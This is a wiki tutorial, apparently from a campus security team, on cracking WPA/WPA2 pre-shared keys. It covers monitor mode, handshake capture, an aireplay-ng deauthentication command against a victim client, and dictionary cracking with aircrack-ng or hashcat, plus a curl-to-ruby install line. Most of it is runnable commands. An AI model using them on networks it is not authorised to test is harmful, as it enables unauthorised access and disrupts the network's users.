Difference between revisions of "WPA/WPA2 PSK deauthentication attack"
m (JPDoe moved page WPA/WPA2 PSK deauthentication attack with aircrack-ng to WPA/WPA2 PSK deauthentication attack: The article is no longer limited to aircrack-ng.) |
m (Added "Accessed" to references) |
||
Line 273: | Line 273: | ||
= References = | = References = | ||
* https://www.aircrack-ng.org/doku.php?id=cracking_wpa | * https://www.aircrack-ng.org/doku.php?id=cracking_wpa (Accessed 10. April 2020) | ||
* https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1 | * https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1 (Accessed 10. April 2020) | ||
* https://www.netspotapp.com/wifi-encryption-and-security.html | * https://www.netspotapp.com/wifi-encryption-and-security.html (Accessed 10. April 2020) | ||
* https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html | * https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html (Accessed 10. April 2020) | ||
* http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html | * http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html (Accessed 10. April 2020) | ||
* https://github.com/brannondorsey/wifi-cracking | * https://github.com/brannondorsey/wifi-cracking (Accessed 10. April 2020) | ||
* https://hashcat.net/cap2hccapx/ | * https://hashcat.net/cap2hccapx/ (Accessed 10. April 2020) | ||
* https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 | * https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 (Accessed 10. April 2020) | ||
[[Category:Documentation]] | [[Category:Documentation]] |
Revision as of 19:08, 11 April 2020
Summary
How to sniff a WPA/WPA2 handshake using a deauthentication attack and crack the Pre-Shared Key (PSK). Aircrack-ng forms a versatile application suite for analyzing and attacking wireless networks but is not the only option in this game. This guide will use GNU/Linux to demonstrate how to use aircrack-ng and macOS to show that this process can be done more efficiently without aircrack-ng. Anyway, these processes can be mixed to get the best process for your situation.
Requirements
Mandatory
GNU/Linux
- Install aircrack-ng suite:
sudo apt install aircrack-ng
Application | Description |
aircrack-ng | 802.11 WEP and WPA/WPA2-PSK key cracking program. |
airbase-ng | Aimed at attacking clients as opposed to the AP itself. |
airdecap-ng | Decrypt WEP/WPA/WPA2 capture files. |
airdecloak-ng | Remove WEP CloakingTM from a packet capture file. |
airdrop-ng | A rule based wireless deauthication tool. |
aireplay-ng | Inject and replay wireless frames. |
airgraph-ng | Graph wireless networks. |
airmon-ng | Enable and disable monitor mode on wireless interfaces. |
airodump-ng | Capture raw 802.11 frames. |
airolib-ng | Precompute WPA/WPA2 passphrases. |
airserv-ng | Wireless card TCP/IP server to use wit multiple applications. |
airtun-ng | Virtual tunnel interface creator. |
packetforge-ng | Create encrypted packets that can be used for injection. |
macOS
- Install Homebrew, the Missing Package Manager for macOS (or Linux):
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
- Optional: Install aircrack-ng suite:
brew install aircrack-ng
- Install tcpdump:
brew install tcpdump
- Install wireshark to use mergecap:
brew install wireshark
- Enable 'hidden' airport feature:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
Optional
Hashcat
- Clone GIT repository:
git clone https://github.com/hashcat/hashcat.git
- Build:
cd ./hashcat && make && make install
- Link:
sudo ln -s ./hashcat /usr/local/bin/hashcat
Background
Problem
Attacks on wireless networks use the advantage that the WLAN protocol (IEEE 802.11) is not encrypted. Only the payload is encrypted. In the case of WPA2, this is usually done using AES. To exploit this weakness, a beacon frame must be intercepted by the hacker to identify the name (BSSID), MAC address (SSID) and channel (radio frequency) of the target access point. Afterwards, this information can be used to sniff packets from that network as desired. To get full access to the network, the WPA2 Pre-shared Key (PSK) is still required. To get it, only 3 steps are necessary, plus some time:
- Sniff a beacon management frame containing all information about the network
- Sniff a four-way hanshake containing dynamic payload encryption keys
- Crack the PSK offline, using data dumps acquired in the previous steps
Solution
The most recent encryption standard WPA3 is designed to protect against such offline dictionary attacks to guess the password, since an attack has unlimited attempts to guess the PSK by implementing a new key exchange protocol. WPA2 used an imperfect four-way handshake between clients and access points to enable encrypted connections. WPA3 will eliminate this vulnerability in favor of more secure and widely verified simultaneous authentication through equal handshake. Additionally, this new handshake supports forward-secrecy.
Procedure
With aircrack-ng (on GNU/Linux)
Put your interface in monitor mode
- Use airmon-ng to put interface in monitor mode
airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 83)
- First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
airmon-ng Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y PHY Interface Driver Chipset phy0 wlan0mon iwlwifi Intel Corporation Wireless 7260 (rev 83)
- Kill all processes which use physical device
airmon-ng check kill Killing these processes: PID Name 895 wpa_supplican
- Start in monitor mode
airmon-ng start wlan0mon 9
Capture Beacon
- using wireshark or airodump-ng
airodump-ng wlan0mon
- You will need:
- BSSID (MAC address of access point): <bssid>
- Access point channel: <channel>
- MAC address of a victim, wireless client using WPA2
Capture handshake
- Get handshake or connected station
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
Crack with aircrack-ng
- download a password list from somewhere https://github.com/danielmiessler/SecLists/blob/master/Passwords/ and issue following aircrack-ng command to crack the password
aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap
Reset network configuration
- Stop monitor mode
airmon-ng stop wlan0mon
- Restart network manager for internet access
service network-manager restart
Without aircrack-ng (on macOS)
airport -h Supported arguments: -c[<arg>] --channel=[<arg>] Set arbitrary channel on the card -z --disassociate Disassociate from any network -I --getinfo Print current wireless status, e.g. signal info, BSSID, port type etc. -s[<arg>] --scan=[<arg>] Perform a wireless broadcast scan. Will perform a directed scan if the optional <arg> is provided -x --xml Print info as XML -P --psk Create PSK from specified pass phrase and SSID. The following additional arguments must be specified with this command: --password=<arg> Specify a WPA password --ssid=<arg> Specify SSID when creating a PSK -h --help Show this help
Capture Beacon
# Scan sudo airport -s SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -72 11 Y de WPA2 (PSK/AES/AES) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -57 1 Y de WPA2 (PSK/AES/AES) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -66 36 Y de WPA2 (PSK/AES/AES)
Capture Handshake
The Easy way
# Sniff - Ctrl-C to stop capturing sudo airport $INTERFACE sniff $CHANNEL
The Good way
By using airmon-ng or airport a large number of unnecessary packets are captured. Also, you cannot know for sure if a handshake has been intercepted until you manually abort the scan. This process can be improved with tcpdump.
- Disassociate from any network: (-z --disassociate)
sudo airport -z
- Set arbitrary channel on the card: (-c[<arg>] --channel=[<arg>])
sudo airport -c$CHANNEL
- Capture a beacon frame from the AP
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i $INTERFACE -w beacon.cap
- Wait for the WPA handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i $INTERFACE -w handshake.cap
- Merge the two files
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
Crack PSK
The .cap file obtained in the previous steps can only be cracked directly with aircrack-ng. But this can be done more effectively using hashcat (or John the Ripper).
- Convert .cap to .hcapx file (Part of hashcat-utils)
cap2hccapx capture.cap capture.hccapx
- Crack using a simple dictionnary attack:
hashcat -m 2500 capture.hccapx wordlist.txt
Deauthentication attack
Use one of the methods below to force devices on the target network, if any, to de-authenticate. When re-authenticating, a four-way handshake is exchanged between the client and the AP, which can be captured easily. The deauthenticated target may only remark a short network disruption, but nothing more.
Aircrack-ng
aireplay-ng -0 1 -a $BSSID -c $VICTIM_MAC wlan0mon
- -0 means deauthentication
- 1 number of deauthentication frames sent
- -a bssid mac address
- -c victim mac address to deauthenticate
D-Stike Deauther
D-Stike provides a range of ESP8266 based development board, which come installed with the latest ESP8266 Deauther software developed by Spacehuhn. The source code is availabel on Github. With this software, you can perform different attacks to test WiFi networks. One of them is the deauthentication attack.
Other tools
JamWiFi is a Software with GUI, which allows you to select one or more nearby wireless networks, thereupon presenting a list of clients which are currently active on the network(s). Furthermore, JamWiFi allows you to disconnect clients by performing a deauthentication attack.
Used Hardware
- Notebook, Ubuntu 18.04 bionic amd64, with Wifi interface card
- MacBook Pro (15-inch, 2017), macOS 10.14.6, Airport Extreme (Broadcom BCM43xx 1.0)
- DSTIKE Deauther Watch V1
Courses
- Campus Cyber Security Team WiFi Hacking 21.06.2019
References
- https://www.aircrack-ng.org/doku.php?id=cracking_wpa (Accessed 10. April 2020)
- https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1 (Accessed 10. April 2020)
- https://www.netspotapp.com/wifi-encryption-and-security.html (Accessed 10. April 2020)
- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html (Accessed 10. April 2020)
- http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html (Accessed 10. April 2020)
- https://github.com/brannondorsey/wifi-cracking (Accessed 10. April 2020)
- https://hashcat.net/cap2hccapx/ (Accessed 10. April 2020)
- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 (Accessed 10. April 2020)